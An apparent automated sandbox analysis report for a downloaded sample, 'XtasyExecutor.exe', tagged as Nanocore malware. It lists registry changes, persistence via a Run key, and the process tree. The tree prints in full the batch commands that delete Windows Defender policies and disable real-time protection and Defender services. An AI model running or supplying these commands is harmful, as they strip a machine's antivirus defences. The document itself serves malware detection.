Analysis
-
max time kernel
70s -
max time network
69s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
17-12-2024 18:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/Dmq7NE
Resource
win10ltsc2021-20241211-en
General
-
Target
https://gofile.io/d/Dmq7NE
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Nanocore family
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation XtasyExecutor.exe -
Executes dropped EXE 2 IoCs
pid Process 4840 XtasyExecutor.exe 4396 XtasyExecutor.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NAS Manager = "C:\\Program Files (x86)\\NAS Manager\\nasmgr.exe" XtasyExecutor.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XtasyExecutor.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\67c0f94a-b514-4e49-836b-be128291e9b6.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241217181138.pma setup.exe File created C:\Program Files (x86)\NAS Manager\nasmgr.exe XtasyExecutor.exe File created C:\Program Files (x86)\NAS Manager\nasmgr.exe\:SmartScreen:$DATA XtasyExecutor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Program Files (x86)\NAS Manager\nasmgr.exe\:SmartScreen:$DATA XtasyExecutor.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 843977.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 460 msedge.exe 460 msedge.exe 1352 msedge.exe 1352 msedge.exe 4772 identity_helper.exe 4772 identity_helper.exe 2224 msedge.exe 2224 msedge.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe 4840 XtasyExecutor.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4840 XtasyExecutor.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4840 XtasyExecutor.exe Token: SeDebugPrivilege 1628 taskmgr.exe Token: SeSystemProfilePrivilege 1628 taskmgr.exe Token: SeCreateGlobalPrivilege 1628 taskmgr.exe Token: 33 1628 taskmgr.exe Token: SeIncBasePriorityPrivilege 1628 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe -
Suspicious use of SendNotifyMessage 56 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe 1628 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1352 wrote to memory of 1132 1352 msedge.exe 81 PID 1352 wrote to memory of 1132 1352 msedge.exe 81 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 4532 1352 msedge.exe 83 PID 1352 wrote to memory of 460 1352 msedge.exe 84 PID 1352 wrote to memory of 460 1352 msedge.exe 84 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 PID 1352 wrote to memory of 1652 1352 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Dmq7NE1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff49c546f8,0x7fff49c54708,0x7fff49c547182⤵PID:1132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:22⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:82⤵PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:12⤵PID:4000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:12⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:12⤵PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6092 /prefetch:82⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:12⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6320 /prefetch:82⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 /prefetch:82⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:2108 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x1e8,0x254,0x7ff756995460,0x7ff756995470,0x7ff7569954803⤵PID:4592
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6696 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
C:\Users\Admin\Downloads\XtasyExecutor.exe"C:\Users\Admin\Downloads\XtasyExecutor.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\disable-defender.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:5932 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- System Location Discovery: System Language Discovery
PID:5988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:6004
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:6020
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:6036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:6052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:6068
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:6084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:6100
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:6116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:6132
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
